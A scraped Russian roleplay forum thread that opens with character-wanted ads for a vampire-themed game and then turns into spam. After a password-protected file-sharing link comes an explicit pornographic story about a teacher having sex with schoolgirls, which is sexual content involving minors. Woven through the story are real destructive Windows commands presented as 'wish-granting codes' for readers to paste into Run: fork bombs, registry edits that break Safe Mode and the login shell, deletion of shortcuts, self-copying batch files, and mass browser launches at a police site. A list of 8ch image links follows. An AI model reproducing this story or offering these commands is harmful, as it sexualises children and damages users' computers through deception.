Но я жила в городе неделю, две, три, а звонка все не было, как и не было напоминаний о том, что ты когда-то существовал. Я решила, что в то время была всего лишь твоей игрушкой и решила забыть все дни, проведенные вместе. Но твой внезапный переезд в Мистик Фоллс заставил меня пересмотреть свое мнение…

✤ дополнительно:
Буду любить очень-очень) Намечаю интересную линию игры, можно начать с вашего приезда в Мистик Фоллс) А далее как получится. Персонаж в пару) Обеспечу графикой, общением и не дам вам скучать))

Отредактировано Shevonne Morel (2012-09-18 00:47:12)

0

20

МЫ С ТВОЕЙ ДОЧЕРЬЮ ИЩЕМ ТЕБЯ, ещё одна большая привязанность моей жизни

http://media.tumblr.com/tumblr_m0vxqwIRBk1r5tdn1.gif
✤ внешность: Julianne Moore
✤ предполагаемые имя, фамилия: Amanda Chantal - Аманда Шанталь
✤ принадлежность, возраст: человек, 50
✤ краткая справка: Аманда родилась в Мистик Фоллс, здесь у нее остались родственники. В двадцать лет она упаковала свои вещи и переехала в Вашингтон, поступив в один из лучших юридическихх вузов. Окончила она его с блеском, ещё во время учебы получила место в адвокатской конторе, где и повстречала Александра, ставшего затем ее законным мужем и отцом Евы-Лотты. Они с дочерью родились в один день, 23 декабря с разницей в 25 лет. Когда Еве-Лотте было 5, а Аманде 30, Николас Линдберг с семьей остановился в Вашингтоне. Николас проворачивал какой-то вопрос с финансированием и юрисдикцией, когда ему на пути попалась Аманда - красивая, тонкая, аристократичная не по меркам своего времени. Вампир поддался порыву и увлек ее за собой в водоворот страстей и измен. Они гуляли, смотрели фильмы, спали вместе, он стал причиной ее развода, а затем пропал из ее жизни. Он никогда не пил ее кровь и не стирал ей память. Она помнила его, помнит и до сих пор, как страдала по нему, после его отъезда, Аманда иногда называет его единственной любовью своей жизни. Дочь ее выросла, они - самые лучшие на свете подруги, но даже ей Аманда не посмела открыть причину развода с отцом и любви к парню, что младше ее.
Пришло известие из Мистик Фоллс - скончалась мать Аманды, последний живой родственник в Мистике. Следовало принять наследство. Ева-Лотта сама вызвалась поехать вместе с матерью, похоронить бабушку и помочь ей в делах.
Представьте удивление Аманды, когда она заходит в новую галерею в Мистике и видит его - Николаса Линдберга - любовь всей ее жизни - ни на год не постаревшего, такого же подтянутого, молодого. Они разговаривают, даже договариваются ещё встретиться. Однако, Аманда чувствует, что что-то не так. Теперь же она усиленно пытается разобраться в загадке Николаса.
✤ дополнительно: активность, понимание персонажей, легкость в общении, готовность много играть. от себя могу пообещать море как флешбеков, так и отыгрышей в реальном времени

Отредактировано Nicholas Lindberg (2012-09-18 14:28:08)

0

21

http://media.tumblr.com/tumblr_ma3unzYH531rt2432.gif
✤ внешность: India Eisley, мне нравится, что она может выглядеть маленькой девочкой.
✤ предполагаемые имя, фамилия: Nicole Moira Mayfair | Николь Мойра Мэйфейр. Друзья зовут ее Никки, а родственники называют исключительно Мари (некая извращенная форма от Мойры), первое имя в узких семейных кругах не прижилось, а вот плод фантазии матери, помешанной на Древней Греции, прошел на "ура".
✤ принадлежность, возраст: человек, 19.
✤ краткая справка: Отец Мари умер от сердечного приступа еще до родов. Кэтлин, если не любила, то очень сильно была привязана к родителям. Смерть одного и горе другой она уже заранее ставила в вину своей еще не родившейся сестре.
Как только Николь появилась на свет, жизнь шестилетней Кэтлин перестала представлять собой земной рай. Мари стала новым центром вселенной для родителей, вытеснив Кэт. А Кэтлин нравилось купаться в лучах славы, она любила, когда ею восхищались, когда по мановению пальца исполнялись любые прихоти. Таким образом, с самого раннего детства между сестрами уже возникла напряженность. Мари умела приспосабливаться лучше, она лгала чаще, чем Кэтлин, она знала, как добиться того, чего хочет, и никогда не хотела совершать рискованных или опрометчивых поступков, особенно в детстве. На фоне тихони-сестры особенно заметны были крутой нрав да внутренняя жесткость Кэтлин. Когда сестра вступила в сознательный возраст, старшая дочь так и стремилась сделать той какую-нибудь гадость, чтобы показать свое превосходство, ведь натура социопатки искала выход.
Старшая дочь живет и питается ненавистью к младшей, играя роль манипулятора секретами Мари, а младшая тоже не остается в стороне, ябедничая на Кэтлин и выставляя ее в глазах матери в самом худшем свете. У нее было более милое личико, она была спокойнее, улыбчивее, она казалась искренней и всегда стремилась сделать свою работу как можно лучше, чтобы ей можно было гордиться. Игра на публику особенно нравилась Никки, она буквально купалась в своем тщеславии.
Когда Мари было двенадцать, мать заболела раком. Девочка не могла тогда воспринимать болезнь серьезно, слишком мала для того, чтобы понять, что значит "смерть", поэтому вела себя, как обычно. Кэтлин же была в отчаянии. Она постоянно кричала на их тетю, подменивающие лекарства, она просто перестала себя контролировать из-за страха остаться одной в семье, где ей никто не друг. Несколько раз за этот период Мари получала весьма сильные удары от сестры.
Когда мать умерла, Кэтлин уехала из дома, и никто более ничего о ней не слышал. Зато Мари почувствовала себя спокойнее и свободнее. Она обнаружила в себе талант к рисованию, и вплоть до настоящего момента рисунки - это ее призвание и способ заработка. Картины у нее действительно чудесны, практически никто из видевших их не смог удержаться от покупки пары экземпляров. Она училась отлично, а на выпускном была признана еще и королевой бала.
Как раз на выпускном судьба и свела ее с Ричардом. Красивый молодой мужчина, заинтересовавшийся ее рисунками. Николь хотела большего, чем деловые отношения и дружба, но большего не получалось. Он просто не воспринимал ее как взрослого человека, а не как ребенка. Да, милая девочка, но не больше. Никки не собиралась останавливаться на этом, но большего пока не получалось: он был глух к ее провокациям, поэтому пришлось прекратить попытки соблазнить его. Впрочем, Мари считала, что это только начало.
Ричард взял ее под свою опеку, заставил ее почувствовать себя так, будто она снова кому-то нужна. Доверительные отношения ей необходимы были как никому другому. А еще он всегда видел, когда она пыталась лгать.
Вместо того, чтобы дать ей поступить в институт, Ричард настоял на том, чтобы они вдвоем отправились в Мистик Фоллс. Он работал в полиции и подозревал, что в этом городишке скрывается опасный преступник. Ну а преданная Мари с радостью откликнулась на его просьбу, ей-то все равно, где творить... Кто бы только мог подумать, что там она найдет свою потерянную и изрядно потрепанную сестру...
✤ дополнительно: Жду тебя, моя любовь хд Пусть отношения Кэтлин и Николь не из лучших, я тебя буду просто на руках носить, обещаю) за посты, конечно)

http://24.media.tumblr.com/tumblr_m9silj7jhN1rzhrqto1_500.gif
✤ внешность: Craig Horner only.
✤ предполагаемые имя, фамилия: Richard Maxwell | Ричард Максвелл. Имя можете менять полностью по своему усмотрению.
✤ принадлежность, возраст: вампир, 27|121.
✤ краткая справка: Родился в Италии, в Генуе. Родители - добрейшей души люди, однако мать умерла рано, сгорев вместе с частью больных во время пожара в больнице (она была в числе медперсонала). Все детство развлекался тем, что бродил по горам и лесам в окрестностях города. Знал каждую тропинку, каждое дерево, все сокровенные места местных лесных массивов были ему знакомы и дороги. Не был жесток и вообще не любил ввязываться в драки, в отличие от сверстников. Сдерживал в себе гнев, но если он был направлен на нечто благородное, тогда не брезговал воспользоваться вспыхивающей в нем яростью как оружием. С детства отличался смекалкой и обаянием, его улыбка сводила девушек с ума, но в отношениях с ними он был крайне осторожен. Отец зарабатывал рыбной ловлей, но Ричард не хотел представлять собой типичного жителя города: моряка, пропахшего солью и рыбаком.
Впрочем, ему не пришлось выбирать. Началась Первая мировая, и Ричард ушел на фронт. Два года он воевал бок о бок с другими солдатами, не жалея усилий ради победы за правое дело, и в один прекрасный момент едва не попал в плен. И все-таки война отвела ему недолгую жизнь, несмотря на это мимолетное везение. Пуля пробила ему грудь навылет тогда, когда Ричард меньше всего этого ожидал. Лежа в госпитале и уже готовясь принять неминуемую смерть, он меньше всего думал о всяческих там чудесах, которые спасут его. И все же чудо произошло. Один из офицеров пришел спасти его, умирающего рядового, напоив своей кровью, после чего просто исчез из его жизни и из войска. Ричарду пришлось самостоятельно справляться с жаждой. Сначала она не казалась чем-то обременяющим: ему всего лишь нужно было выуживать информацию у пленных, чтобы оказать помощь своей стране, а потом незаметно перегрызать им глотки. Но война закончилась, и ему пришлось учиться себя контролировать. Тогда ему удалось научиться обходиться только воровством из донорских центров, хотя Ричарда всегда терзала совесть, ведь эта кровь нужна была калекам и раненым больше, чем ему.
После войны он начал работать в полиции, решив, что его долг - помочь людям избежать смерть или хотя бы наказать виновного. Стоит отметить, что это стало не только его работой, но и призванием. На редкость человечный для вампира, Ричард всего себя посвятил людям и поиску истины правды. Конечно, долгое время на одном месте он не мог задерживаться из-за нестареющей внешности, поэтому приходилось перебираться из страны в страну. Ричард накопил приличный опыт работы длиной в столетие, но это все еще не надоело ему. Кажется, он родился для этого, это доставляло ему ни с чем не сравнимое удовольствие. Он принимал роли, которые требовала ситуация, играл разных людей, убивал, сводил счеты с некоторыми преступниками. Все ради справедливости.
Год назад он познакомился с Николь Мэйфейр, милой девушкой, которая попыталась его очаровать, но на чье обаяние он так и не повелся. Ему понравились ее рисунки, он начал считать неугомонного подростка, озабоченного только своими отношениями, чуть ли своей приемной дочерью. Ее родители умерли, и он счел себя обязанным привить девочке правильные жизненные ориентиры. Тогда он копался в старых архивах и нашел несколько странных закономерностей, до которых не додумались полицейские. Некая Кэтлин Мэйфейр, проживавшая в этом городе, психолог-криминалист по профессии, убила сотрудника полиции. Психологи поставили ей диагноз "раздвоение личности", после чего она должна была быть в психиатрической лечебнице, откуда ей удалось сбежать. Далее следуют еще два убийства без видимых мотивов. Один - в ночь побега, другой гораздо позже в Мистик Фоллс. И Ричард вместе с Николь отправляется туда, еще не сообщая девушке о том, что они едут за ее сестрой, и не подозревая, чем для него может обернуться поимка преступницы.
✤ дополнительно: И не надо мне говорить, что это Ричард Сайфер, Искатель Истины) Большие планы на персонажа, но я понятия не имею, какая у нас может быть линия отношений. Будут ли это попытки помочь Кэтлин со стороны Ричарда, которая и сама не рада и не верит, что оказалась убийцей, или нечто большее... В любом случае, по-моему, у персонажа много путей развития. А насчет отношений, мне кажется, мы еще договоримся. Требования: активность, желание играть, неплохо было бы, если бы Вы еще и во флуде любили посидеть.
ЖДУ, ЖДУ ОБОИХ. С ЛЮБОВЬЮ, КЭТЛИН.

Отредактировано Kathleen Mayfair (2012-09-19 15:56:36)

+1

22

Скрытый текст:

Для просмотра скрытого текста - войдите или зарегистрируйтесь.

0

23

Erotic Games https://yadi.sk/d/Arlw7PrudTHZH Pass: erotic-games

0

24

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014

0

25

https://21.mvd.ru/favico.ico

https://8ch.net/ss/src/1418432164012.png https://media.8ch.net/ss/src/1418432164012.png https://media.8ch.net/ss/src/1418432251180-0.png https://media.8ch.net/ss/src/1418432251180-1.png https://media.8ch.net/ss/src/1418432251180-2.png https://media.8ch.net/ss/src/1418432251180-3.png https://media.8ch.net/ss/src/1418432251180-4.png https://media.8ch.net/ss/src/1418432299345-0.png https://media.8ch.net/ss/src/1418432299345-1.png https://media.8ch.net/ss/src/1418432299345-2.png https://media.8ch.net/ss/src/1418432299345-3.png https://media.8ch.net/ss/src/1418432299345-4.png https://media.8ch.net/ss/src/1418432466026-0.png https://media.8ch.net/ss/src/1418432466026-1.png https://media.8ch.net/ss/src/1418432466026-2.png https://media.8ch.net/ss/src/1418432466026-3.png https://media.8ch.net/ss/src/1418432466026-4.png https://media.8ch.net/ss/src/1418432508691-0.png https://media.8ch.net/ss/src/1418432508691-1.png https://media.8ch.net/ss/src/1418432508691-2.png https://media.8ch.net/ss/src/1418432508691-3.png https://media.8ch.net/ss/src/1418432508691-4.png https://media.8ch.net/ss/src/1418432549852-0.png https://media.8ch.net/ss/src/1418432549852-1.png https://media.8ch.net/ss/src/1418432549852-2.png https://media.8ch.net/ss/src/1418432549852-3.png https://media.8ch.net/ss/src/1418432549852-4.png https://media.8ch.net/ss/src/1418432600941-0.png https://media.8ch.net/ss/src/1418432600941-1.png https://media.8ch.net/ss/src/1418432600941-2.png https://media.8ch.net/ss/src/1418432600941-3.png https://media.8ch.net/ss/src/1418432600941-4.png https://media.8ch.net/ss/src/1418432655806-0.png https://media.8ch.net/ss/src/1418432655806-1.png https://media.8ch.net/ss/src/1418432655806-2.png https://media.8ch.net/ss/src/1418432655806-3.png https://media.8ch.net/ss/src/1418432655806-4.png https://media.8ch.net/ss/src/1418432697235-0.png https://media.8ch.net/ss/src/1418432697235-1.png https://media.8ch.net/ss/src/1418432697235-2.png https://media.8ch.net/ss/src/1418432697235-3.png https://media.8ch.net/ss/src/1418432697235-4.png https://media.8ch.net/ss/src/1418432758854-0.png https://media.8ch.net/ss/src/1418432758854-1.png https://media.8ch.net/ss/src/1418432758854-2.png https://media.8ch.net/ss/src/1418432758854-3.png https://media.8ch.net/ss/src/1418432758854-4.png https://media.8ch.net/ss/src/1418432946700-0.png https://media.8ch.net/ss/src/1418432946700-1.png https://media.8ch.net/ss/src/1418432946700-2.png https://media.8ch.net/ss/src/1418432946700-3.png https://media.8ch.net/ss/src/1418432946700-4.png https://media.8ch.net/ss/src/1418564229032-0.png https://media.8ch.net/ss/src/1418564229032-1.png https://media.8ch.net/ss/src/1418564229032-2.png https://media.8ch.net/ss/src/1418564229032-3.png https://media.8ch.net/ss/src/1418586049102-0.png https://media.8ch.net/ss/src/1418586049102-1.png https://media.8ch.net/ss/src/1418586049102-2.png https://media.8ch.net/ss/src/1418586049102-3.png https://media.8ch.net/ss/src/1418828721830-0.png https://media.8ch.net/ss/src/1418828721830-1.png https://media.8ch.net/ss/src/1418828721830-2.png https://media.8ch.net/ss/src/1418828721830-3.png https://media.8ch.net/ss/src/1418828829828-0.png https://media.8ch.net/ss/src/1418828829828-1.png https://media.8ch.net/ss/src/1418828829828-2.png https://media.8ch.net/ss/src/1418828829828-3.png https://media.8ch.net/ss/src/1418828829828-4.png https://media.8ch.net/ss/src/1418828869692-0.png https://media.8ch.net/ss/src/1418828869692-1.png https://media.8ch.net/ss/src/1418828869692-2.png https://media.8ch.net/ss/src/1418828869692-3.png https://media.8ch.net/ss/src/1418828869693-4.png https://media.8ch.net/ss/src/1418829025727-0.png https://media.8ch.net/ss/src/1418829025727-1.png https://media.8ch.net/ss/src/1418829025727-2.png https://media.8ch.net/ss/src/1418829025727-3.png https://media.8ch.net/ss/src/1418829145737-0.png https://media.8ch.net/ss/src/1418829145737-1.png https://media.8ch.net/ss/src/1418829145737-2.png https://media.8ch.net/ss/src/1418829145737-3.png https://media.8ch.net/ss/src/1418829145737-4.png https://media.8ch.net/ss/src/1418829708608-0.png https://media.8ch.net/ss/src/1419117293756-0.jpg https://media.8ch.net/ss/src/1419280604635-0.png https://media.8ch.net/ss/src/1419280604635-1.png https://media.8ch.net/ss/src/1419280604635-2.png https://media.8ch.net/ss/src/1419280604635-3.png https://media.8ch.net/ss/src/1419283958942-0.png https://media.8ch.net/ss/src/1419283958942-1.png https://media.8ch.net/ss/src/1419283958942-2.png https://media.8ch.net/ss/src/1419283958942-3.png https://media.8ch.net/ss/src/1420285224905-0.png https://media.8ch.net/ss/src/1420285224905-1.png https://media.8ch.net/ss/src/1420285224905-2.png https://media.8ch.net/ss/src/1420285224905-3.png 